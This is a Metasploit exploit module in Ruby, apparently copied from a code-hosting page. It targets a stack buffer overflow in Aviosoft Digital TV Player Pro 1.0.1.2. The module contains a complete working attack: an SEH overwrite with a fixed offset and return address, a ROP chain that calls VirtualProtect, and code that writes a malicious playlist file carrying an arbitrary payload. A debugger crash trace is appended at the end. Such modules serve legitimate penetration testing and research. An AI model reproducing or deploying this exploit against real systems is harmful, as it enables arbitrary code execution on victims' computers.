142 lines
4.7 KiB
Ruby
142 lines
4.7 KiB
Ruby
|
##
|
||
|
# This file is part of the Metasploit Framework and may be subject to
|
||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||
|
# Framework web site for more information on licensing and terms of use.
|
||
|
# http://metasploit.com/framework/
|
||
|
##
|
||
|
|
||
|
require 'msf/core'
|
||
|
|
||
|
class Metasploit3 < Msf::Exploit::Remote
|
||
|
Rank = GoodRanking
|
||
|
|
||
|
include Msf::Exploit::FILEFORMAT
|
||
|
|
||
|
def initialize(info={})
|
||
|
super(update_info(info,
|
||
|
'Name' => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",
|
||
|
'Description' => %q{
|
||
|
This module exploits a vulnerability found in Aviosoft Digital TV Player
|
||
|
Pro version 1.x. An overflow occurs when the process copies the content of a
|
||
|
playlist file on to the stack, which may result aribitrary code execution under
|
||
|
the context of the user.
|
||
|
},
|
||
|
'License' => MSF_LICENSE,
|
||
|
'Author' =>
|
||
|
[
|
||
|
'modpr0be', #Initial discovery, poc
|
||
|
'sinn3r', #Metasploit
|
||
|
],
|
||
|
'References' =>
|
||
|
[
|
||
|
['URL', 'http://www.exploit-db.com/exploits/18096/'],
|
||
|
],
|
||
|
'Payload' =>
|
||
|
{
|
||
|
'BadChars' => "\x00\x0a\x1a",
|
||
|
'StackAdjustment' => -3500,
|
||
|
},
|
||
|
'DefaultOptions' =>
|
||
|
{
|
||
|
'ExitFunction' => "seh",
|
||
|
},
|
||
|
'Platform' => 'win',
|
||
|
'Targets' =>
|
||
|
[
|
||
|
[
|
||
|
'Aviosoft DTV Player 1.0.1.2',
|
||
|
{
|
||
|
'Ret' => 0x6130534a, #Stack pivot (ADD ESP,800; RET)
|
||
|
'Offset' => 612, #Offset to SEH
|
||
|
'Max' => 5000 #Max buffer size
|
||
|
}
|
||
|
],
|
||
|
],
|
||
|
'Privileged' => false,
|
||
|
'DisclosureDate' => "Apr 1 2011",
|
||
|
'DefaultTarget' => 0))
|
||
|
|
||
|
register_options(
|
||
|
[
|
||
|
OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])
|
||
|
], self.class)
|
||
|
end
|
||
|
|
||
|
def junk(n=1)
|
||
|
return [rand_text_alpha(4).unpack("L")[0]] * n
|
||
|
end
|
||
|
|
||
|
def nops(rop=false, n=1)
|
||
|
return rop ? [0x61326003] * n : [0x90909090] * n
|
||
|
end
|
||
|
|
||
|
def exploit
|
||
|
rop = [
|
||
|
nops(true, 10), #ROP NOP
|
||
|
0x6405347a, #POP EDX # RETN (MediaPlayerCtrl.dll)
|
||
|
0x10011108, #ptr to &VirtualProtect
|
||
|
0x64010503, #PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)
|
||
|
junk,
|
||
|
0x6160949f, #MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)
|
||
|
junk(3),
|
||
|
0x61604218, #PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)
|
||
|
junk(3),
|
||
|
0x6403d1a6, #POP EBP # RETN (MediaPlayerCtrl.dll)
|
||
|
junk(3),
|
||
|
0x60333560, #& push esp # ret 0c (Configuration.dll)
|
||
|
0x61323EA8, #POP EAX # RETN (DTVDeviceManager.dll)
|
||
|
0xA13977DF, #0x00000343-> ebx
|
||
|
0x640203fc, #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
|
||
|
0x6163d37b, #PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)
|
||
|
0x61626807, #XOR EAX,EAX # RETN (EPG.dll)
|
||
|
0x640203fc, #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)
|
||
|
0x6405347a, #POP EDX # RETN (MediaPlayerCtrl.dll)
|
||
|
0xA13974DC, #0x00000040-> edx
|
||
|
0x613107fb, #ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)
|
||
|
0x60326803, #POP ECX # RETN (Configuration.dll)
|
||
|
0x60350340, #&Writable location
|
||
|
0x61329e07, #POP EDI # RETN (DTVDeviceManager.dll)
|
||
|
nops(true), #ROP NOP
|
||
|
0x60340178, #POP EAX # RETN
|
||
|
nops, #Regular NOPs
|
||
|
0x60322e02 #PUSH # RETN
|
||
|
].flatten.pack("V*")
|
||
|
|
||
|
buf = ''
|
||
|
buf << rand_text_alpha(target['Offset']-buf.length)
|
||
|
buf << [target.ret].pack('V*')
|
||
|
buf << rand_text_alpha(136)
|
||
|
buf << rop
|
||
|
buf << make_nops(32)
|
||
|
buf << payload.encoded
|
||
|
buf << rand_text_alpha(target['Max']-buf.length)
|
||
|
|
||
|
file_create(buf)
|
||
|
end
|
||
|
end
|
||
|
|
||
|
=begin
|
||
|
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000
|
||
|
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0 nv up ei pl nz na pe nc
|
||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||
|
MediaPlayerCtrl!DllCreateObject+0x220:
|
||
|
6400f6f0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
|
||
|
0:000> !exchain
|
||
|
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll
|
||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -
|
||
|
DTVDeviceManager+534a (6130534a)
|
||
|
Invalid exception stack at 41414141
|
||
|
0:000> !address edi
|
||
|
00130000 : 00130000 - 00003000
|
||
|
Type 00040000 MEM_MAPPED
|
||
|
Protect 00000002 PAGE_READONLY
|
||
|
State 00001000 MEM_COMMIT
|
||
|
Usage RegionUsageIsVAD
|
||
|
0:000> !address esi
|
||
|
047a0000 : 047a0000 - 0000b000
|
||
|
Type 00020000 MEM_PRIVATE
|
||
|
Protect 00000004 PAGE_READWRITE
|
||
|
State 00001000 MEM_COMMIT
|
||
|
Usage RegionUsageHeap
|
||
|
Handle 013c0000
|
||
|
=end
|